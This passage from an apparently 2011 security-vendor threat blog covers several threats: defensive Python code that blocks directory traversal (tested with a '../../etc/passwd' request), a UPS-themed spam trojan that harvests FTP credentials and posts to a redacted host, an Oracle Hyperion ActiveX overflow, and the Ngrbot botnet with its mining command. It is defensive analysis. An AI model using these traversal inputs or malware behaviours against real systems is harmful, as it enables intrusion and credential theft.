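    names = []
    for opcode, data in parse_records(msg):
        if opcode != FILE_REQUEST_OPCODE or len(data) <= 4:
            continue  # per the write-up, short 0x03 records are listing requests
        y = data[1]
        name = data[4:4 + y]
        if len(name) != y:
            raise ValueError("sub record filename length exceeds record data")
        names.append(name)
    return names


def resolve_in_base(base_dir: str, filename: bytes) -> Optional[str]:
    """Join the request to the base directory and refuse anything that escapes it.
    The vulnerable server appends without this check, so '..' sequences walk out;
    an absolute filename is caught too, since os.path.join would discard the base."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename.decode("latin-1")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def build_file_request(filename: bytes) -> bytes:
    """Constructed 0x03 record carrying one file-request sub record."""
    sub = bytes([FILE_REQUEST_OPCODE, len(filename), 0, 0]) + filename
    return OUTER_HDR.pack(FILE_REQUEST_OPCODE, b"\0\0\0", len(sub), b"\0\0\0\0") + sub


BASE = "/var/opt/mediaops"   # hypothetical configured base directory

if __name__ == "__main__":
    for req in (b"reports/today.txt", b"../../etc/passwd"):
        for name in requested_filenames(build_file_request(req)):
            print(name, "->", resolve_in_base(BASE, name))
```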

SonicWALL has released a generic IPS signature to address this issue. The following signature was released:

  • 7175 – HP Data Protector Media Operations Directory Traversal Attempt.

UPS Invoice Notification spam campaign (Nov. 23, 2011)

With the holiday season approaching, the SonicWALL UTM Research team has observed a surge in online threats. Reports of an e-mail spam campaign carrying a malware attachment that pretends to come from United Parcel Service (UPS) continue to flood inboxes.

Computer users are advised to take precautions when opening unsolicited e-mails, especially from unknown senders. UPS also hosted this presentation to raise awareness about UPS-related scams.

The behavior of this malware is further discussed below:

Subject: United Parcel Service – Invoice is available [random numbers]

Attachment: UPS-Billing-Invoice-Notification-[random numbers].zip

Message Body:

    UPS Billing Center

    This is an automatically generated email. Please do not reply to this email address.

    Dear UPS Customer,

    A new invoice is now available in the UPS Billing Centre.
    Please refer to attached file for more details

    Please visit the UPS Billing Centre to view and pay your invoice.

    Coming Soon!
    Effective January 2012, the UPS Billing Centre can be accessed using your My UPS ID.
    Current UPS Billing Centre users will be prompted to convert to a My UPS ID. Learn more

    Discover more about UPS:
    Visit ups.com
    Explore UPS Freight Services
    Learn About UPS Companies
    Sign Up For Additional Email From UPS
    Read Compass Online

    (c) 2011 United Parcel Service of America, Inc., the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
    For more information on UPS’s privacy practices, refer to the UPS Privacy Policy.
    Please do not reply directly to this e-mail. UPS will not receive any reply message.
    For questions or comments, visit Contact UPS.

    This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
    Privacy Policy
    Contact UPS

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

Files Created:

  • Application Data\Somonekpos.exe – copy of the original malware – blocked as GAV: Kryptik.VUY
  • Application Data\Afisaawqide.myx – data file
  • Application Data\Afisaawqide.dat – data file

Harvests email addresses:

  • Microsoft Address Book
  • Internet Browser Cookies

Checks for installed client FTP:

  • FlashFXP
  • Ghisler\Total Commander
  • ipswitch\ws_ftp
  • Far\Plugins\ftp\hosts
  • Far2\Plugins\ftp\hosts
  • martin prikryl\winscp 2\sessions
  • ftpware\coreftp\sites
  • smartftp\client 2.0\settings\general\favorites

Network Activity:

    DNS Request: nos{removed}n.ru

    Post Request: http://nos{removed}n.ru/become.php

Virtual Machine Detection:

    Key: HKLM\System\CurrentControlSet\Services\Disk\Enum
    Value: 0
    Data:

    • IDE\DiskVMware_Virtual_IDE_Hard_Drive
    • IDE\DiskVBOX_HARDDISK

VNC Server Detection:

    Tries to connect to a VNC server and waits for the following response:

    • RFB 003.003

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV:Kryptik.VUY (Trojan)

Oracle Hyperion ActiveX BO (Nov 18, 2011)

Oracle’s Hyperion is composed of various business performance management and business intelligence software. The Hyperion Financial line of products includes financial reporting and analysis components. Installation of Hyperion Financial on Windows systems will result in the installation of several ActiveX controls, one of which is named TTF16.ocx. This ActiveX control is associated with CLSID B0475003-7740-11D1-BDC3-0020AF9F8E6E, and ProgID TTF161.TTF1.6. The control is marked as scriptable, and as such can be instantiated from a web page by using the <object> tag or through scripting. The following snippet demonstrates instantiation through scripting:

  var ctrl = new ActiveXObject("TTF161.TTF1.6");

The TTF161.TTF1.6 control exposes several methods, one of which is a method named SetDevNames, which is used to set the default printer. An example code snippet illustrating the use of this function is shown:

SetDevNames('drivername', 'devicename', 'port')

A code execution vulnerability exists in Oracle’s Hyperion Financial TTF161.TTF1.6 ActiveX control. The vulnerability exists because of a heap buffer overflow during execution of the SetDevNames method. The method allocates a heap buffer of size determined by the number of characters in the given attributes. The method then converts the parameters into Unicode strings which results in doubling of their size. The Unicode strings are then copied into the allocated buffer. If any of the three parameters is not an empty string, a heap buffer overflow will occur.

In order to exploit this vulnerability, the attacker needs to entice the target user to visit a malicious web page. Any code execution resulting from exploitation will occur in the security context of the currently logged-in user. An unsuccessful code execution attempt may result in abnormal termination of the web browser.

SonicWALL has released an IPS signature that detects and blocks exploitation attempts targeting this vulnerability. The following signature has been released:

  • 7161 – Oracle Hyperion Strategic TTF16 ActiveX Buffer Overflow

Ngrbot steals information and mines Bitcoins (Nov 18, 2011)

SonicWALL UTM Research team discovered Ngrbot spreading in the wild. The bot steals user information and spreads through malicious links, removable drives, instant messengers and social networks. After initial infection, it downloads additional modules including a Bitcoin mining module. Bitcoin is a form of digital currency, and one way of obtaining it is by mining. Mining for Bitcoins is a very computationally expensive process involving a great deal of hashing, making it time consuming and impractical on a single personal computer. The creators of this botnet have found a lucrative alternative for generating Bitcoins by leveraging the CPU cycles of infected machines.

Ngrbot uses misleading filenames with explicit icons as shown below:

screenshot

It performs the following activities:

  • It determines geoip details by sending a request to api.wipmania.com.
  • It contacts a remote C&C server to report infection and receive additional commands.
  • It downloads additional modules from a remote file hosting server.
  • It drops the following files:
    • %AppData%\9.exe [Detected as Injector.KSW_2 (Trojan)]
    • %AppData%\A.exe (Corrupted file)
    • %AppData%\kakao3fuckHDZSDP.exe [Detected as Ngrbot.GEN_3 (Worm)]
    • %AppData%\kakao3 new.exe [Detected as BtcMiner (Trojan)]
    • %AppData%\Xkagad.exe (Copy of itself) [Detected as Ngrbot.GEN_3 (Worm)]
    • Start Menu\Programs\Startup\newmoon17.exe [Detected as Injector.KSW_3 (Trojan)]
  • It ensures persistence of the infection across reboots:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run: Xkagad: “%AppData%\Xkagad.exe”
    • Creates the startup file Start Menu\Programs\Startup\newmoon17.exe
  • It has the following information-stealing modules:
    • popgrab
    • ftpgrab
    • ffgrab
    • iegrab
  • It has the ability to perform DoS (Denial of Service) attacks.
  • It blocks access to various antivirus and security websites by intercepting DNS.
  • It uses form grabbers to steal credentials from the following URLs:
      screenshot

  • It has the ability to spread through MSN Messenger and removable drives. It also has the ability to post to Bebo, Friendster, Vkontakte, Twitter and Facebook.
  • It attempts to load “nvcuda.dll” (Nvidia CUDA) if present to mine Bitcoins on the GPU (Graphics Processing Unit).
  • It kills all previous Bitcoin mining infections:
      screenshot

  • It mines for Bitcoins at 59-second intervals by executing the following command:
      mine.exe -a 59 -o http://{removed}.org:8332/ -u darksons_crypt -p pt

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Ngrbot.GEN (Worm)
  • GAV: Ngrbot.GEN_3 (Worm)

This threat is also classified as “Dorkbot.A (Worm)” by some vendors.
